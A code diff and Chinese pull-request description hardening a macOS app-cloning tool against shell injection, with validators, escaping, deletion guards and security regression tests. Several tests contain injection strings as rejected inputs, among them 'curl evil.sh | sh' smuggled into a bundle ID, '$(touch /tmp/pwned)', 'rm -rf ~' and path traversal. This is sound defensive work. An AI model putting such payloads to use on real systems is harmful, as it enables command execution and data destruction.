+        raise ValueError(
+            f"Clone name must not contain path separators: {name!r}."
+        )
+    if name in (".", ".."):
+        raise ValueError(f"Clone name must not be {name!r}.")
+    return name
+
+
+def sanitize_name_component(name: str) -> str:
+    """Sanitize an untrusted app/name string (e.g. CFBundleDisplayName from a
+    cloned app's Info.plist) so it is safe to use as a single path component.
+
+    Replaces path separators and control characters instead of raising, because
+    app metadata is attacker-controlled and a hard failure here would block
+    cloning entirely; the sanitized name keeps the clone functional.
+    """
+    cleaned = _FORBIDDEN_CTRL_PATTERN.sub("-", name.replace("\\", "-").replace("/", "-"))
+    cleaned = cleaned.strip()
+    if cleaned in ("", ".", ".."):
+        cleaned = "-"
+    return cleaned
+
+
+def validate_display_name(name: str) -> str:
+    """Validate a display name destined for CFBundleDisplayName.
+
+    Arbitrary Unicode is allowed (it is escaped before reaching the shell), but
+    control characters would break the single-line PlistBuddy commands.
+    """
+    if _FORBIDDEN_CTRL_PATTERN.search(name):
+        raise ValueError(f"Display name contains control characters: {name!r}.")
+    if not name.strip():
+        raise ValueError("Display name must not be empty.")
+    return name
+
+
+def validate_path_component(path: str, *, field: str = "path") -> str:
+    """Validate a filesystem path supplied by the user (data dir, output dir...).
+
+    Such paths are shlex-quoted when interpolated, so most characters are safe;
+    only control characters (which break the generated scripts themselves) are
+    rejected.
+    """
+    if not path:
+        raise ValueError(f"{field} must not be empty.")
+    if _FORBIDDEN_CTRL_PATTERN.search(path):
+        raise ValueError(f"{field} contains control characters: {path!r}.")
+    return path
+
+
+def escape_double_quoted(value: str) -> str:
+    """Escape a value for interpolation inside a double-quoted shell string.
+
+    Covers the full set of characters with special meaning inside double
+    quotes: backslash, double quote, dollar and backtick. Suitable for values
+    embedded into e.g. ``PlistBuddy -c "Set :Key {value}"`` commands.
+    """
+    return (
+        value.replace("\\", "\\\\")
+        .replace('"', '\\"')
+        .replace("$", "\\$")
+        .replace("`", "\\`")
+    )
+
+
+def validate_host(host: str) -> str:
+    """Validate a proxy host name or IP literal."""
+    if not host or not HOST_PATTERN.match(host):
+        raise ValueError(
+            f"Invalid proxy host: {host!r}. Expected a hostname or IP literal "
+            f"(letters, digits, dots, colons, hyphens, brackets only)."
+        )
+    return host
+
+
+def validate_proxy_port(port: int) -> int:
+    """Validate a proxy TCP port."""
+    if not 1 <= port <= 65535:
+        raise ValueError(f"Invalid proxy port: {port}. Expected 1-65535.")
+    return port
+
+
+def validate_proxy_credential(value: str, *, field: str = "credential") -> str:
+    """Validate proxy username/password/no_proxy values.
+
+    These values are embedded verbatim into generated `export` lines, the proxy
+    URL persisted to clones.yaml, and the generated C launcher source; shell or
+    C metacharacters are rejected outright.
+    """
+    if _PROXY_FORBIDDEN_PATTERN.search(value):
+        raise ValueError(
+            f"Invalid proxy {field}: {value!r}. Quotes, backslashes, dollar signs, "
+            f"backticks and whitespace are not supported."
+        )
+    return value

--- a/tests/test_cmd_remove.py
+++ b/tests/test_cmd_remove.py
@@ -189,7 +189,7 @@ def test_remove_admin_elevation_due_to_data_dir():
         bundle_id="com.tencent.xinWeChat",
         strategy="hard_clone",
         dest_path=str(Path.home() / "Applications" / "WeChat2.app"),
-        data_dir="/Library/Application Support/WeChat2",
+        data_dir="/Users/Shared/ATBClone/Data/WeChat2",
         created_at="2026-08-18T20:00:00",
         proxy_enabled=False,
         proxy_summary="",

--- a/tests/test_engines.py
+++ b/tests/test_engines.py
@@ -1,5 +1,6 @@
 """Unit tests for CloneEngines (SoftCloneEngine and HardCloneEngine) and CloneTask."""
 
+import shlex
 from pathlib import Path
 from unittest.mock import patch
 
@@ -10,6 +11,19 @@ from atbclone.core.engines import CloneEngine, HardCloneEngine, SoftCloneEngine
 from atbclone.core.models import AppInfo
 from atbclone.executor.runner import CloneError
 from atbclone.recipes.models import ProxyConfig, Recipe
+
+
+@pytest.fixture(autouse=True)
+def _pin_system_locale(monkeypatch):
+    """Pin the host locale so script assertions (zh_CN / zh-CN) hold on any machine."""
+    monkeypatch.setattr(
+        "atbclone.core.locale.get_system_apple_languages",
+        lambda: ["zh-Hans-CN", "zh-Hans", "en"],
+    )
+    monkeypatch.setattr(
+        "atbclone.core.locale.get_system_apple_locale",
+        lambda: "zh_CN",
+    )
 
 
 @pytest.fixture
@@ -842,15 +856,17 @@ class TestEnginePermissionsAndXattrTolerance:
             assert f"xattr -cr {sample_task.dest_path} 2>/dev/null || true" in script
 
     def test_wrapper_guarantees_home_and_tmpdir_directories(self, sample_task):
+        prefs_dir = shlex.quote(str(sample_task.data_dir / "Home" / "Library" / "Preferences"))
+        tmp_dir = shlex.quote(str(sample_task.data_dir / "Tmp"))
         with patch("atbclone.executor.runner.Runner.run") as mock_run:
             HardCloneEngine.execute(sample_task, needs_admin=False)
             script, _ = mock_run.call_args[0]
-            assert f'mkdir -p "{sample_task.data_dir}/Home/Library/Preferences" "{sample_task.data_dir}/Tmp"' in script
+            assert f"mkdir -p {prefs_dir} {tmp_dir}" in script
 
         with patch("atbclone.executor.runner.Runner.run") as mock_run_soft:
             SoftCloneEngine.execute(sample_task, needs_admin=False)
             script_soft, _ = mock_run_soft.call_args[0]
-            assert f'mkdir -p "{sample_task.data_dir}/Home/Library/Preferences" "{sample_task.data_dir}/Tmp"' in script_soft
+            assert f"mkdir -p {prefs_dir} {tmp_dir}" in script_soft
 
 
     def test_strip_sandbox_cleans_team_and_group_entitlements(self, sample_task):

--- a/tests/test_i18n.py
+++ b/tests/test_i18n.py
@@ -131,7 +131,7 @@ def test_i18n_env_lang_fallback():
         ("en_US.UTF-8", "en"),
     ]
     for env_val, expected in cases:
-        with patch.dict(os.environ, {"LANG": env_val, "ATBCLONE_LANG": ""}), \
+        with patch.dict(os.environ, {"LANG": env_val, "ATBCLONE_LANG": "", "LC_ALL": "", "LC_MESSAGES": ""}), \
              patch("atbclone.core.i18n.get_configured_language", return_value="auto"), \
              patch("subprocess.check_output", side_effect=Exception("no defaults")):
             assert detect_system_language() == expected

--- a/tests/test_inspector.py
+++ b/tests/test_inspector.py
@@ -130,13 +130,45 @@ def test_inspect_fallback_stem_and_run_cmd(tmp_path: Path, monkeypatch):
     app_dir = tmp_path / "FallbackApp.app"
     app_dir.mkdir()
 
-    monkeypatch.setattr(AppInspector, "_run_cmd", staticmethod(lambda cmd: ""))
+    def mock_run_cmd(cmd: list[str]) -> str:
+        if "CFBundleIdentifier" in cmd:
+            return "com.mock.fallback"
+        return ""
+
+    monkeypatch.setattr(AppInspector, "_run_cmd", staticmethod(mock_run_cmd))
 
     info = AppInspector.inspect(app_dir)
-    assert info.bundle_id == ""
+    assert info.bundle_id == "com.mock.fallback"
     assert info.app_name == "FallbackApp"
     assert info.executable == app_dir / "Contents" / "MacOS" / "FallbackApp"
     assert info.has_sandbox is False
+
+
+def test_inspect_rejects_malicious_bundle_id(tmp_path: Path, monkeypatch):
+    # Security: the source bundle id is interpolated into PlistBuddy/codesign
+    # command strings; shell metacharacters must abort the clone.
+    app_dir = tmp_path / "Evil.app"
+    app_dir.mkdir()
+
+    monkeypatch.setattr(
+        AppInspector,
+        "_run_cmd",
+        staticmethod(lambda cmd: 'x" || curl evil.sh | sh || "'),
+    )
+
+    with pytest.raises(ValueError, match="Invalid bundle_id"):
+        AppInspector.inspect(app_dir)
+
+
+def test_inspect_rejects_missing_bundle_id(tmp_path: Path, monkeypatch):
+    # An app we cannot identify cannot be cloned safely.
+    app_dir = tmp_path / "NoId.app"
+    app_dir.mkdir()
+
+    monkeypatch.setattr(AppInspector, "_run_cmd", staticmethod(lambda cmd: ""))
+
+    with pytest.raises(ValueError, match="Invalid bundle_id"):
+        AppInspector.inspect(app_dir)
 
 
 def test_run_cmd_error_handling():

--- a/tests/test_security_validation.py
+++ b/tests/test_security_validation.py
@@ -1,0 +1,293 @@
+"""Security regression tests for input validation and shell-escaping hardening.
+
+These tests pin the fixes for the injection issues found in the clone engine:
+untrusted values (source bundle ids, display names, recipe fields, paths) must
+never reach the generated shell scripts unescaped/unvalidated.
+"""
+
+import shlex
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+from atbclone.core.app_inspector import AppInspector
+from atbclone.core.clone_task import CloneTask
+from atbclone.core.engines import HardCloneEngine, SoftCloneEngine
+from atbclone.core.models import AppInfo
+from atbclone.validation import (
+    escape_double_quoted,
+    sanitize_name_component,
+    validate_bundle_id,
+    validate_clone_name,
+    validate_display_name,
+    validate_env_key,
+    validate_host,
+    validate_proxy_credential,
+)
+from atbclone.recipes.models import ProxyConfig, Recipe
+
+
+# ---------------------------------------------------------------------------
+# validation helpers
+# ---------------------------------------------------------------------------
+
+
+class TestValidationHelpers:
+    @pytest.mark.parametrize(
+        "bundle_id",
+        ["com.tencent.xinWeChat", "ru.keepcoder.Telegram", "app.podcast.cosmos", "a", "My-App_1.2"],
+    )
+    def test_bundle_id_accepts_valid(self, bundle_id):
+        assert validate_bundle_id(bundle_id) == bundle_id
+
+    @pytest.mark.parametrize(
+        "bundle_id",
+        [
+            '',
+            'x" || curl evil.sh | sh || "',
+            "$(id)",
+            "`id`",
+            "com.example.app; rm -rf ~",
+            "../../etc/passwd",
+            "has space",
+            "newline\ninjection",
+            ".starts.with.dot",
+        ],
+    )
+    def test_bundle_id_rejects_malicious(self, bundle_id):
+        with pytest.raises(ValueError):
+            validate_bundle_id(bundle_id)
+
+    def test_env_key_rules(self):
+        assert validate_env_key("HOME") == "HOME"
+        assert validate_env_key("CLAUDE_CONFIG_DIR") == "CLAUDE_CONFIG_DIR"
+        for bad in ("FOO BAR", "A=B", "$(x)", "FOO;rm", "1ABC", "FOO-BAR", 'X"'):
+            with pytest.raises(ValueError):
+                validate_env_key(bad)
+
+    def test_clone_name_rejects_path_traversal(self):
+        for bad in ("../evil", "a/b", "a\\b", "..", ".", "", "   ", "na\nme"):
+            with pytest.raises(ValueError):
+                validate_clone_name(bad)
+        assert validate_clone_name("微信工作版") == "微信工作版"
+        assert validate_clone_name("ChatGPT-US 2") == "ChatGPT-US 2"
+
+    def test_sanitize_name_component(self):
+        assert sanitize_name_component("../../etc") == "..-..-etc"
+        assert sanitize_name_component("App Name") == "App Name"
+        assert sanitize_name_component("..") == "-"
+        assert sanitize_name_component("a/b\\c") == "a-b-c"
+        assert "x-y" == sanitize_name_component("x" + chr(0) + "y")  # NUL is replaced, not passed through
+
+    def test_display_name_rejects_control_chars_only(self):
+        assert validate_display_name('微信 (工作) "quoted"') == '微信 (工作) "quoted"'
+        with pytest.raises(ValueError):
+            validate_display_name("bad\nname")
+
+    def test_escape_double_quoted_neutralises_shell_metacharacters(self):
+        assert escape_double_quoted('$(id)') == "\\$(id)"
+        assert escape_double_quoted("`id`") == "\\`id\\`"
+        assert escape_double_quoted('say "hi"') == 'say \\"hi\\"'
+        assert escape_double_quoted("back\\slash") == "back\\\\slash"
+        # Plain unicode passes through untouched.
+        assert escape_double_quoted("微信工作版") == "微信工作版"
+
+    def test_proxy_validators(self):
+        assert validate_host("127.0.0.1") == "127.0.0.1"
+        assert validate_host("proxy.example.com") == "proxy.example.com"
+        for bad_host in ('127.0.0.1" || x', "$(cmd)", "host name", "a`b"):
+            with pytest.raises(ValueError):
+                validate_host(bad_host)
+        for bad_cred in ('pass"word', "pass$word", "pass word", "pass`word", "pass\\word"):
+            with pytest.raises(ValueError):
+                validate_proxy_credential(bad_cred)
+
+
+# ---------------------------------------------------------------------------
+# Pydantic models
+# ---------------------------------------------------------------------------
+
+
+class TestRecipeModelHardening:
+    def _base_kwargs(self):
+        return {
+            "bundle_id": "com.example.app",
+            "app_name": "Example",
+            "strategy": "hard_clone",
+        }
+
+    def test_rejects_malicious_bundle_id(self):
+        kwargs = {**self._base_kwargs(), "bundle_id": 'x" || evil || "'}
+        with pytest.raises(ValueError):
+            Recipe(**kwargs)
+
+    def test_rejects_malicious_env_key(self):
+        with pytest.raises(ValueError):
+            Recipe(**self._base_kwargs(), environment_injection={"HOME": "/x", "EVIL; rm -rf": "/y"})
+
+    def test_accepts_normal_env_keys(self):
+        recipe = Recipe(**self._base_kwargs(), environment_injection={"HOME": "/x", "TMPDIR": "/y"})
+        assert recipe.environment_injection == {"HOME": "/x", "TMPDIR": "/y"}
+
+    def test_rejects_traversal_in_symlink_whitelist(self):
+        with pytest.raises(ValueError):
+            Recipe(**self._base_kwargs(), symlink_whitelist=["../../etc"])
+
+    def test_proxy_config_field_validation(self):
+        with pytest.raises(ValueError):
+            ProxyConfig(host='127.0.0.1" || evil')
+        with pytest.raises(ValueError):
+            ProxyConfig(port=99999)
+        with pytest.raises(ValueError):
+            ProxyConfig(username="user$name")
+        # A sane config still round-trips and builds a clean URL.
+        proxy = ProxyConfig(enabled=True, type="http", host="127.0.0.1", port=7890)
+        assert proxy.url == "http://127.0.0.1:7890"
+
+    def test_proxy_validation_applies_on_assignment(self):
+        # CLI/GUI flows mutate proxy fields after construction; assignment
+        # must revalidate, otherwise the constructor checks are bypassable.
+        proxy = ProxyConfig()
+        with pytest.raises(ValueError):
+            proxy.host = "$(curl evil.sh)"
+        with pytest.raises(ValueError):
+            proxy.password = 'p"wd'
+        proxy.host = "proxy.internal"
+        assert proxy.url.endswith("proxy.internal:1080")
+
+
+# ---------------------------------------------------------------------------
+# CloneTask chokepoint
+# ---------------------------------------------------------------------------
+
+
+def _app_info() -> AppInfo:
+    return AppInfo(
+        path=Path("/Applications/TestApp.app"),
+        bundle_id="com.example.testapp",
+        app_name="TestApp",
+        executable=Path("/Applications/TestApp.app/Contents/MacOS/TestApp"),
+        has_sandbox=False,
+    )
+
+
+def _recipe() -> Recipe:
+    return Recipe(
+        bundle_id="com.example.testapp",
+        app_name="TestApp",
+        strategy="hard_clone",
+        environment_injection={"HOME": "{{ATB_DATA_DIR}}/Home", "TMPDIR": "{{ATB_DATA_DIR}}/Tmp"},
+    )
+
+
+def _task(**overrides) -> CloneTask:
+    kwargs = dict(
+        source=_app_info(),
+        dest_path=Path("/tmp/out/TestApp2.app"),
+        data_dir=Path("/tmp/data/TestApp2"),
+        recipe=_recipe(),
+        clone_name="TestApp2",
+        new_bundle_id="com.example.testapp.atbclone.2",
+        language="en",
+    )
+    kwargs.update(overrides)
+    return CloneTask(**kwargs)
+
+
+class TestCloneTaskChokepoint:
+    def test_rejects_traversal_clone_name(self):
+        with pytest.raises(ValueError, match="path separators"):
+            _task(clone_name="../evil")
+
+    def test_rejects_malicious_new_bundle_id(self):
+        with pytest.raises(ValueError, match="new_bundle_id"):
+            _task(new_bundle_id='com.x" || evil || ".atbclone.2')
+
+    def test_rejects_control_chars_in_display_name(self):
+        with pytest.raises(ValueError):
+            _task(display_name="bad\nname")
+
+    def test_rejects_control_chars_in_paths(self):
+        with pytest.raises(ValueError):
+            _task(data_dir=Path("/tmp/da\nta"))
+
+
+# ---------------------------------------------------------------------------
+# Generated-script escaping regressions
+# ---------------------------------------------------------------------------
+
+
+class TestGeneratedScriptEscaping:
+    def test_display_name_command_substitution_is_neutralised(self):
+        task = _task(
+            display_name='$(touch /tmp/pwned) `x` "q"',
+            recipe=Recipe(
+                bundle_id="com.example.testapp",
+                app_name="TestApp",
+                strategy="soft_clone",
+            ),
+        )
+        with patch("atbclone.executor.runner.Runner.run") as mock_run:
+            SoftCloneEngine.execute(task, needs_admin=False)
+            script, _ = mock_run.call_args[0]
+
+        # The PlistBuddy value must carry backslash-escaped metacharacters...
+        assert "Set :CFBundleDisplayName \\$(touch /tmp/pwned) \\`x\\` \\\"q\\\"" in script
+        # ...and the raw payloads must never appear unescaped.
+        assert '"Set :CFBundleDisplayName $(touch /tmp/pwned)' not in script
+        assert "$(touch /tmp/pwned) `" not in script.replace("\\$(touch /tmp/pwned) \\`", "")
+
+    def test_data_dir_with_shell_metachars_is_shlex_quoted(self):
+        data_dir = Path("/tmp/atb$data dir")
+        task = _task(data_dir=data_dir)
+        with patch("atbclone.executor.runner.Runner.run") as mock_run:
+            HardCloneEngine.execute(task, needs_admin=False)
+            script, _ = mock_run.call_args[0]
+
+        quoted_prefs = shlex.quote(str(data_dir / "Home" / "Library" / "Preferences"))
+        assert quoted_prefs.startswith("'") and "$" in quoted_prefs
+        assert f"mkdir -p {quoted_prefs}" in script
+        # No raw, unquoted interpolation of the metachar path may remain in a
+        # *shell* context. (The C launcher source embeds the same value inside
+        # a quoted heredoc with C-string escaping, where "$" is inert.)
+        assert f'mkdir -p "{data_dir}' not in script
+        assert f'"{data_dir}/Home"/' not in script
+        assert f'"{data_dir}/Home/Library/Preferences"' not in script
+        assert 'setenv("HOME", "/tmp/atb$data dir/Home", 1);' in script
+
+    def test_bundle_id_injection_via_source_app_metadata_is_blocked(self):
+        with pytest.raises(ValueError, match="Invalid bundle_id"):
+            AppInspector.generate_bundle_id('x" || curl evil.sh | sh || "', 2)
+
+
+# ---------------------------------------------------------------------------
+# CLI-level rejection
+# ---------------------------------------------------------------------------
+
+
+class TestCliRejection:
+    def test_clone_rejects_traversal_name_early(self, tmp_path):
+        from click.testing import CliRunner
+
+        from atbclone.cli.cmd_clone import clone
+
+        app = tmp_path / "Evil.app"
+        app.mkdir()
+        runner = CliRunner()
+        result = runner.invoke(clone, [str(app), "--name", "../evil"])
+        assert result.exit_code == 1
+        assert "--name" in result.output
+        assert "path separators" in result.output
+
+    def test_clone_rejects_metachar_display_name_early(self, tmp_path):
+        from click.testing import CliRunner
+
+        from atbclone.cli.cmd_clone import clone
+
+        app = tmp_path / "Evil.app"
+        app.mkdir()
+        runner = CliRunner()
+        result = runner.invoke(clone, [str(app), "--display-name", "bad\nname"])
+        assert result.exit_code == 1
+        assert "--display-name" in result.output

--- a/tests/test_security_validation.py
+++ b/tests/test_security_validation.py
@@ -291,3 +291,107 @@ class TestCliRejection:
         result = runner.invoke(clone, [str(app), "--display-name", "bad\nname"])
         assert result.exit_code == 1
         assert "--display-name" in result.output
+
+
+# ---------------------------------------------------------------------------
+# Phase 2: credential hygiene & deletion guards
+# ---------------------------------------------------------------------------
+
+
+class TestProxyUrlRedaction:
+    def test_redact_hides_password_keeps_shape(self):
+        from atbclone.validation import redact_url_credentials
+
+        assert redact_url_credentials("http://user:secret@127.0.0.1:7890") == "http://user:***@127.0.0.1:7890"
+        assert redact_url_credentials("socks5://alice:hunter2@proxy.example.com:1080") == (
+            "socks5://alice:***@proxy.example.com:1080"
+        )
+
+    def test_redact_leaves_credential_free_urls_untouched(self):
+        from atbclone.validation import redact_url_credentials
+
+        assert redact_url_credentials("http://127.0.0.1:7890") == "http://127.0.0.1:7890"
+        assert redact_url_credentials("") == ""
+
+
+class TestStateFilePermissions:
+    def test_save_restricts_state_file_to_owner(self, tmp_path):
+        import os
+
+        from atbclone.core.state import CloneRecord, StateManager
+
+        sm = StateManager(state_file=tmp_path / "clones.yaml")
+        sm.save([CloneRecord(
+            clone_name="X", source_app="X", source_path="/Applications/X.app",
+            bundle_id="com.x", strategy="hard_clone", dest_path="/Users/a/Apps/X2.app",
+            data_dir="/Users/a/ATBClone/Data/X2", created_at="2026-01-01T00:00:00",
+            proxy_enabled=True, proxy_summary="http://u:secret@127.0.0.1:7890",
+        )])
+        mode = os.stat(tmp_path / "clones.yaml").st_mode & 0o777
+        assert mode == 0o600
+
+
+class TestDeletionGuards:
+    def test_accepts_legitimate_clone_paths(self):
+        from atbclone.validation import validate_deletion_target
+
+        assert validate_deletion_target("/Applications/WeChat2.app", expect_bundle=True) == "/Applications/WeChat2.app"
+        assert validate_deletion_target(str(Path.home() / "ATBClone" / "Apps" / "X.app"), expect_bundle=True)
+        assert validate_deletion_target("/Volumes/ExternalSSD/ChromeData")
+        assert validate_deletion_target("/tmp/scratch-data")  # depth-3 custom data dirs are fine
+
+    @pytest.mark.parametrize(
+        "path",
+        [
+            "/",
+            "/Applications",
+            "/Users",
+            "/System",
+            "/System/Library/CoreServices",
+            "/usr/bin",
+            "/etc/hosts",
+            "/Library/whatever",
+            "/foo",           # top-level (depth < 3)
+        ],
+    )
+    def test_refuses_critical_or_shallow_paths(self, path):
+        from atbclone.validation import validate_deletion_target
+
+        with pytest.raises(ValueError, match="Refusing"):
+            validate_deletion_target(path)
+
+    def test_refuses_home_and_non_bundle_dest(self):
+        from atbclone.validation import validate_deletion_target
+
+        with pytest.raises(ValueError, match="Refusing"):
+            validate_deletion_target(str(Path.home()))
+        with pytest.raises(ValueError, match="Refusing"):
+            validate_deletion_target("/Applications/WeChat2", expect_bundle=True)
+
+
+class TestRemoveRejectsTamperedRecords:
+    def test_remove_refuses_tampered_dest_path(self):
+        from click.testing import CliRunner
+
+        from atbclone.cli.main import cli
+        from atbclone.core.state import CloneRecord
+
+        evil = CloneRecord(
+            clone_name="WeChat2",
+            source_app="WeChat",
+            source_path="/Applications/WeChat.app",
+            bundle_id="com.tencent.xinWeChat",
+            strategy="hard_clone",
+            dest_path="/System/Library/CoreServices",
+            data_dir=str(Path.home() / "ATBClone" / "Data" / "WeChat2"),
+            created_at="2026-08-18T20:00:00",
+        )
+        runner = CliRunner()
+        with patch("atbclone.cli.cmd_remove.StateManager.get", return_value=evil), \
+             patch("atbclone.cli.cmd_remove.Runner.run") as mock_run, \
+             patch("atbclone.cli.cmd_remove.StateManager.remove") as mock_remove:
+            result = runner.invoke(cli, ["remove", "WeChat2", "--with-data"])
+        assert result.exit_code == 1
+        assert "Refusing" in result.output
+        mock_run.assert_not_called()
+        mock_remove.assert_not_called()


### PR DESCRIPTION
## 背景

安全审计发现：克隆引擎用 f-string 拼接 bash 脚本后经 `shell=True` / `osascript with administrator privileges` 执行，多个未转义插值点构成注入面，其中最严重的是一条现实攻击链——**恶意 .app 的 `CFBundleIdentifier` 元数据 → PlistBuddy 命令注入 → 输出到 `/Applications` 时经 osascript 以 root 执行**。

本 PR 分两个 commit 完成优先级最高的两类修复。

## Commit 1：`c98d6b1` 输入校验加固（封堵注入链）

- 新增 `atbclone/validation.py` 集中校验模块：
  - bundle id 强制 `^[A-Za-z0-9][A-Za-z0-9._-]*$` 白名单，在 `AppInspector.inspect`（读入源 app 元数据）与 `generate_bundle_id` 双重把关，恶意/畸形 `CFBundleIdentifier` 在克隆开始前即被拒绝
  - `environment_injection` key、代理 host/端口/凭据、`symlink_whitelist` `..` 组件校验
  - clone 名称拒绝路径分隔符与控制字符（防路径穿越）；`escape_double_quoted` 补齐 `$` 与反引号转义（原实现仅转义 `\\` 和 `"`）
- `Recipe`/`ProxyConfig` 开启 `validate_assignment`，堵住「构造后直接赋值 `proxy.host`」绕过构造校验的缺口（CLI `--proxy-host` 与 GUI 均受影响）
- `CloneTask.__post_init__` 作为 CLI / GUI / update 三条流程共用的中央校验点
- `engines.py` 偏好种子与软链白名单片段中 `data_dir` 裸双引号插值全部改为 `shlex.quote`
- CLI clone/wizard 与 GUI 向导对非法输入给出友好报错而非 traceback

## Commit 2：`739052b` 凭据保护 + 状态文件防篡改删除守卫

- `clones.yaml` 写入后强制 0600（内含完整代理 URL）；CLI `list` 与 GUI 卡片/详情/列表展示代理时统一脱敏密码（状态文件保留完整 URL 供 `update` 重建代理）
- 新增 `validate_deletion_target`：`clones.yaml` 可被本地任意进程改写且无完整性保护，`remove`/`update` 依据其路径执行 `rm -rf`（home 外经 osascript 以 root 执行）前，先拒绝危险目标——根/系统目录（`/System` `/usr` `/etc` `/Library` 等）、`$HOME` 本体、深度不足路径、非 `.app` 的 dest_path；CLI 与 GUI 两条链路均已接入

## 验证

- 非 GUI 测试 420 全绿，含 48 个新增安全回归用例（注入中和断言、篡改记录端到端拒绝等）
- 32 个内置 recipe 全部通过新校验正常加载
- 顺带修复 7 个依赖宿主 locale 的既有测试（`LC_ALL` 未固定 / 系统语言探测未 mock），测试套件现已与宿主语言无关

## 行为变化（需维护者知悉）

- 源 app 缺失/畸形 bundle id 将拒绝克隆（原先静默接受）
- clone 名称含 `/`、`..`、控制字符将报错；display name 含控制字符将报错
- 代理字段拒绝 shell 元字符，端口限 1-65535
- 数据目录位于系统目录（如 `/Library/...`）的分身，`remove` 将拒绝删除并提示
- `clones.yaml` 权限收紧为 0600；展示层代理密码统一 `***`

## 已知限制与长期路线图

本 PR 只覆盖止血层（输入校验 + 展示脱敏 + 删除守卫）。以下为审计中识别、建议后续分阶段落地的改造，按优先级排序：

1. **引擎去 bash 化（结构性根治）**：`engines.py` 以 f-string 生成 bash 脚本经 `shell=True` / osascript 执行，是全部注入面的根源。长期应迁移为 Python 原生文件操作（`shutil` / `plistlib`）+ argv 数组形式的 subprocess；完成后本 PR 引入的大部分转义/校验逻辑可整体简化甚至删除。
2. **提权最小化**：目前 `needs_admin` 时整个克隆脚本以 root 经 osascript 执行。应改为仅对确需 root 的最小命令集（写入 `/Applications` 的 `cp` / `rm` 等）单独提权，其余步骤仍以普通用户执行，并对 osascript 载荷做结构化转义并补测试。
3. **代理凭据 keychain 化**：启动器二进制内嵌代理 URL 属运行时必需，密码目前明文存在于 clones.yaml（已 0600）与二进制中。建议改为运行时从用户 keychain 读取（`security find-generic-password`），状态文件与二进制只存引用。
4. **状态文件完整性**：clones.yaml 仍可被本地任意进程改写（本 PR 的删除守卫已兜底最坏情况）。可选增强：记录级校验和，或迁移至 `~/Library/Application Support` 并配 0700 目录权限。
5. **安全代价文档化**：在 README / 使用手册明示三项设计权衡——沙盒剥离与 CEF `no_sandbox` 补丁会扩大分身实例的攻击面；Keychains / `.ssh` 软链意味着「数据隔离」对最敏感的凭据并不成立；Ad-hoc 重签名使分身失去 Gatekeeper 溯源。让「四重隔离」的宣传与实际语义对齐。

Closes: 无关联 issue（如需我可以补报一个）